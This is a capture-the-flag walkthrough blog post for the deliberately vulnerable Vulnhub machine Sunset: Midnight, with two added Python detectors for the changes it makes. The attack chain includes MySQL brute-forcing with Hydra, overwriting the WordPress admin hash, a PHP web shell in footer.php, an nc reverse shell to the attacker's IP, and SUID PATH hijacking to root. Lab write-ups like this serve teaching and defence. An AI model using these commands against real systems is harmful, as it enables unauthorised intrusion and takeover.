Hello Everyone
Welcome to another CTF walkthrough. Today I will show you how you can break the Sunset: Midnight machine from Vulnhub. So let’s get started.
First you need to download the OVA file and import it into VirtualBox. I have already done that, and I am sure you can do it too. Here is the download link: https://www.vulnhub.com/entry/sunset-midnight,517/
After importing the OVA file, I started the machine and ran netdiscover to find its IP address.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss1.jpg)
Now that I had the IP of the target machine, I scanned it with Nmap. I used the following command:
nmap -sC -sV -oA scanresult 192.168.0.104
In this command, -sC runs the default scripts, -sV does service/version detection, and -oA saves the scan results in all three major output formats.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss2.jpg)
Nmap showed three open ports: 22 (SSH), 80 (HTTP) and 3306 (MySQL). Since port 80 was open, I tried to view the website at http://192.168.0.104 in my browser, but it did not load and instead redirected to http://sunset-midnight, so I added the IP to my hosts file. I used nano for this; you can use any other editor.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss3.jpg)
After adding the IP to my hosts file I was able to visit the website, which turned out to be a WordPress site. So I went to http://sunset-midnight/wp-admin/ and tried some common passwords, but could not find the right one. I did, however, confirm the correct username, which is admin.
Since I could not find any other interesting information on the website, I started enumerating the MySQL service. Reading the MySQL section of the Nmap output, I noticed that the server uses the mysql_native_password plugin for authentication, so I decided to try some common passwords. For this I used THC-Hydra with the rockyou.txt password list; you can use other tools such as Medusa for the brute-force attack. I used the following command:
hydra -l root -P rockyou.txt 192.168.0.104 mysql -vv
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss4.jpg)
When the brute-force attack finished, I had the correct password for the MySQL user “root”. Now it was time to log into MySQL, for which I used the following command:
mysql -h 192.168.0.104 -u root -p
I entered the password and logged in to MySQL, where I found the WordPress site’s database. I used the following command to list all the databases:
show databases;
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss5.jpg)
I selected the WordPress database (wordpress_db) with the following command:
use wordpress_db;
I listed all the tables with the following command:
show tables;
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss6.jpg)
The wp_users table is the most interesting one here, because WordPress stores all its users in it. So I used a SELECT query to see all the data in this table:
select * from wp_users;
After running the query, I found that the WordPress site has only one user, admin. Now it was time to change admin’s password. First I hashed my new password with MD5, then I updated the admin row. This works because WordPress still accepts a bare 32-character MD5 in user_pass for legacy accounts and re-hashes it with its own salted scheme on the next successful login.
I used the following command to hash my password; here 123456 is the new password.
echo -n "123456" | md5sum
I updated admin’s password with the following query:
update wp_users set user_pass = 'e10adc3949ba59abbe56e057f20f883e' where ID = 1;
Now it was time to log into the WordPress admin panel. I went to http://sunset-midnight/wp-admin/ and logged in with username “admin” and password “123456”.
Next I needed a way to run system commands on the server, so I used the theme editor to modify one of the theme’s PHP files. I added the following line to footer.php (the parameter name has to match the one used in the requests below, so it is cmd here):
<?php system($_GET["cmd"]); ?>
Then I opened footer.php directly via this link: http://sunset-midnight/wp-content/themes/twentynineteen/footer.php
First I checked whether the server has Netcat by running the which nc command through my web shell:
http://sunset-midnight/wp-content/themes/twentynineteen/footer.php?cmd=which%20nc
The server has Netcat, so I started a reverse shell with Netcat using the following request:
http://sunset-midnight/wp-content/themes/twentynineteen/footer.php?cmd=nc%20-e%20/bin/sh%20192.168.0.103%209000
I ran the following command in my terminal to listen, and boom, I got a reverse shell.
nc -lvnp 9000
Now I had to upgrade the shell to an interactive one. I spawned a TTY with the following Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'
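Both changes made above leave artifacts on the WordPress side: the direct UPDATE puts an unsalted 32-hex MD5 into wp_users (WordPress itself writes salted phpass or bcrypt hashes), and the theme edit puts a request-driven system() call into a theme file. The following is an added example, not code from the original post, that checks for both against constructed sample data; the wp_users rows and theme file contents are made up for offline use.

```python
import re

# Constructed wp_users rows (not from the target): one bare MD5 of the kind the
# UPDATE above writes, one phpass hash, one bcrypt hash.
SAMPLE_WP_USERS = [
    {"ID": 1, "user_login": "admin", "user_pass": "e10adc3949ba59abbe56e057f20f883e"},
    {"ID": 2, "user_login": "editor", "user_pass": "$P$BcD3fGh1JkLmNoPqRsTuVwXyZ012345"},
    {"ID": 3, "user_login": "ops", "user_pass": "$2y$10$" + "a" * 53},
]

# Constructed theme sources: a clean header and a footer carrying the added line.
SAMPLE_THEME_FILES = {
    "twentynineteen/footer.php": '<?php wp_footer(); ?>\n<?php system($_GET["cmd"]); ?>\n',
    "twentynineteen/header.php": "<?php wp_head(); ?>\n",
}


def hash_scheme(user_pass):
    """Classify wp_users.user_pass by shape. phpass ($P$/$H$) and bcrypt ($2y$) are
    what WordPress writes; a bare 32-hex value is an unsalted MD5, which WordPress
    only tolerates for legacy accounts, so on a site that never had any it points
    at a direct database write."""
    if user_pass.startswith(("$P$", "$H$")):
        return "phpass"
    if user_pass.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if re.fullmatch(r"[0-9a-f]{32}", user_pass):
        return "md5-legacy"
    return "unknown"


def legacy_hash_accounts(rows):
    """Return the logins whose stored hash is an unsalted MD5."""
    return [r["user_login"] for r in rows if hash_scheme(r["user_pass"]) == "md5-legacy"]


# PHP execution sinks fed straight from request input; no stock theme does this.
SINK_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(\s*"
    r"\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)


def request_fed_sinks(files):
    """Return (path, line number, line) for every theme line that passes request
    input to an execution function."""
    hits = []
    for path, source in files.items():
        for no, line in enumerate(source.splitlines(), 1):
            if SINK_RE.search(line):
                hits.append((path, no, line.strip()))
    return hits
```

On a live site the rows would come from a SELECT on wp_users and the file map from walking wp-content/themes; comparing the theme files against a fresh copy of the same theme version catches edits the regex does not.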
Now it was time to enumerate the system, but I did not have enough permissions. So I checked the /etc/passwd file with the following command:
cat /etc/passwd
I found a user, “Jose”, but I needed a password to log in, so I kept enumerating. I checked the WordPress site’s wp-config.php file and got the database username and password. The database user was “Jose”, so I guessed that he might reuse the same password for his system account. I copied the database password, tried to log in to Jose’s account, and boom! I was logged in as Jose.
Now we need to escalate privileges. For this I used the LinEnum shell script to enumerate the whole system. I downloaded the script and transferred it to the target machine.
I ran the following command on my local machine to start a simple HTTP server:
python -m http.server
I ran the following command on the target machine to fetch the LinEnum script:
wget http://192.168.0.103:8000/LinEnum.sh
I added execute permission to the script and ran it. After scanning the system with LinEnum, I found an interesting SUID binary called “status”, so I ran the strings command on it to look at the strings it contains.
![](https://blog.knightsquad.org/wp-content/uploads/2021/04/sunset_midnight_ss7.jpg)
The status binary calls the service binary without giving its full path, which means the name is resolved through the caller’s PATH at run time. So I created a file called service in the /tmp directory, wrote “/bin/sh” into it, and made it executable.
Now I had to put the /tmp directory at the front of my PATH variable. To do this I ran the following command (note the colon between the two parts; a semicolon here would end the assignment after /tmp):
export PATH=/tmp:$PATH
After that I ran the status command and boom, I got root.
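The root cause above is a SUID program that resolves a bare command name through the caller’s PATH. As an added example (not from the original post or the machine), the script below takes constructed strings output and a PATH value and reports which command strings are unqualified and which writable directory would be searched before the real binary; the sample strings and the is_exec/is_writable predicates are assumptions so it runs offline. On the binary’s side the fix is to call /usr/sbin/service by absolute path, or to set PATH itself before any system() call.

```python
import os
import re

# Constructed excerpt of `strings` output mirroring the shape of the finding above
# (a "service ..." string with no leading slash); not the target's actual output.
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2", "setuid", "system", "service ssh start",
    "GCC: (Debian 8.3.0-6) 8.3.0",
]
# Directories where a legitimately installed helper binary lives.
SYSTEM_DIRS = ["/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"]


def first_match(command, dirs, is_exec):
    """Return the first directory in `dirs` holding `command` (shell PATH lookup order)."""
    for d in dirs:
        if is_exec(os.path.join(d, command)):
            return d
    return None


def relative_commands(strings_out, is_exec=os.path.isfile):
    """From `strings` output, return lines whose first word is a system binary
    written without a path; each one becomes a PATH lookup when the program runs."""
    found = []
    for line in strings_out:
        word = line.split(" ", 1)[0]
        if not word or "/" in word or not re.fullmatch(r"[A-Za-z0-9_.-]+", word):
            continue
        if first_match(word, SYSTEM_DIRS, is_exec):
            found.append(line)
    return found


def hijack_dir(command, path_env, is_exec=os.path.isfile,
               is_writable=lambda d: os.access(d, os.W_OK)):
    """Return the first writable PATH directory searched before the directory that
    really holds `command` (or None if the real binary is found first). A SUID
    program that calls `command` by bare name is exposed whenever this is not None."""
    canonical = first_match(command, SYSTEM_DIRS, is_exec)
    for d in (p for p in path_env.split(":") if p):
        if d == canonical:
            return None
        if is_writable(d):
            return d
    return None
```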
Now it was time to find the root.txt flag. I went to the root user’s home directory and found it there.
I hope you guys enjoyed the walkthrough. Don’t forget to share your thoughts and feedback in the comments section.